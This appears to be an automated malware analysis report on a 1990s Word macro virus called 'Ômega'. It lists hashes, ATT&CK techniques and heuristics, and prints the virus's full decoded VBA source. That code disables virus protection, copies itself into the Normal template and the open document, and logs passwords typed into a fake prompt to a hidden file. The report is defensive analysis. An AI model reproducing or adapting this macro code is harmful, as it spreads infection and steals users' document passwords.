Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13c06617a88cf9ff…

MALICIOUS

Office (OLE)

60.0 KB Created: 2000-01-11 21:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 816a3b7779c74653ef773c378966c87e SHA-1: 38dfeda757f538dfdc5e20831f1559e22218c1a4 SHA-256: 13c06617a88cf9ffb0cc122facfa79abf7b4a643e3169d742d0889697973347d
120 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a legacy Word document containing a VBA macro named 'AutoOpen', which is a common technique for executing malicious code upon opening. The heuristic 'SE_PASSWORD_ARCHIVE_LURE' indicates the document's content likely instructs the user to provide a password for an archive, a tactic to evade security controls. The VBA script itself attempts to copy itself to the Normal template and the active document, suggesting an effort to establish persistence or spread.

Heuristics 4

  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15473 bytes
SHA-256: 6b253b57881b304d61073046622e1e3517b4dfbcbfbe467fe2ce90733c9f9823
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ômega"
Sub AutoOpen()
On Error GoTo Final

Infecta
Rotula
Tempo

Final:
End Sub
Sub Infecta()
On Error GoTo Final
       
   Application.ScreenUpdating = False
   Application.DisplayAlerts = wdAlertsNone

   WordBasic.DisableAutoMacros 0
   Options.VirusProtection = False
   
   Application.EnableCancelKey = wdCancelDisabled
   
   CustomizationContext = NormalTemplate
   FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
   FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
   

   Set ActiveDoc = ActiveDocument
   Set GlobalDoc = NormalTemplate

   DocumentInstalled = False
   GlobalInstalled = False
   
   For I = 1 To ActiveDocument.VBProject.VBComponents.Count
      If ActiveDocument.VBProject.VBComponents(I).Name = "Ômega" Then
         DocumentInstalled = True
      End If
   Next

   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
      If NormalTemplate.VBProject.VBComponents(J).Name = "Ômega" Then
         GlobalInstalled = True
      End If
   Next
   
      If DocumentInstalled = False Then
         Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Ômega", Object:=wdOrganizerObjectProjectItems
         ActiveDoc.SaveAs FileName:=ActiveDoc.FullName, FileFormat:=wdFormatTemplate
         Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
         ActiveDoc.SaveAs FileName:=ActiveDoc.FullName, FileFormat:=wdFormatTemplate
      End If
           
     
      If GlobalInstalled = False Then
         Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Ômega", Object:=wdOrganizerObjectProjectItems
         Options.SaveNormalPrompt = False
         Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
         Options.SaveNormalPrompt = False
      End If
    
      If ActiveDocument.HasPassword = False Then GoTo Final
      PassBox.Show
      
Final:
    End Sub
Sub Rotula()
On Error GoTo CMB

   Set FMB = CommandBars.FindControl(Type:=msoControlPopup, ID:=1)
 With FMB
    If .Caption = " " Then GoTo Final
 End With

CMB:
    Set MB = CommandBars.ActiveMenuBar
    Set NM = MB.Controls.Add(Type:=msoControlPopup, Before:=11)
  NM.Caption = " "
    Set BM = NM.Controls _
      .Add(Type:=msoControlButton, ID:=1)
  BM.Caption = "Ômega"
  BM.FaceId = 308
  BM.OnAction = "Show"
         
Final:
        
End Sub
Sub Show()
 Assistant.Visible = True
        With Assistant.NewBalloon
       .Icon = msoIconTip
       .Heading = "ÔMEGA"
       .Text = "       Word97.Macro  " + Chr(13) + Chr(13) + "        By ORiGaME"
       .Show
        End With

End Sub
Sub Analise()
If PassBox.TextBox1 = "" Then
   ActiveDocument.Close
   Unload PassBox
   Else
   Grava
End If

End Sub

Sub Grava()
On Error Resume Next
SetAttr "C:\IO.SDX", 0
Open "C:\IO.SDX" For Append As #1
Print #1, "Path = " + ActiveDocument.FullName
Print #1, "Password = " + PassBox.TextBox1
Print #1, " "
Close #1
SetAttr "C:\IO.SDX", 1 + 2 + 4

Unload PassBox
Application.DisplayAlerts = wdAlertsAll

End Sub

Sub ViewVBCode()

End Sub

Sub Tempo()
On Error GoTo Final
If WeekDay(Now()) = Int(Rnd() * 7 + 1) Then

Set OM = ActiveDocument.Range(Start:=0, End:=0)
 With OM
 .InsertBefore "ÔMEGA" & Chr(13) & "By ORiGaME ©"
 .Font.Name = "Impact"
 .Font.Size = 50
 .Font.ColorIndex = 9
 .Font.Animation = 6
 .Font.Shadow = 1
 End With
End If

Final:
End Sub

Attribute VB_Name = "PassBox"
Attribute VB_Base = "0{D05F720C-5461-11CE-920A-8AE360A51863}{D05F7201-5461-11CE-920A-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False































... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.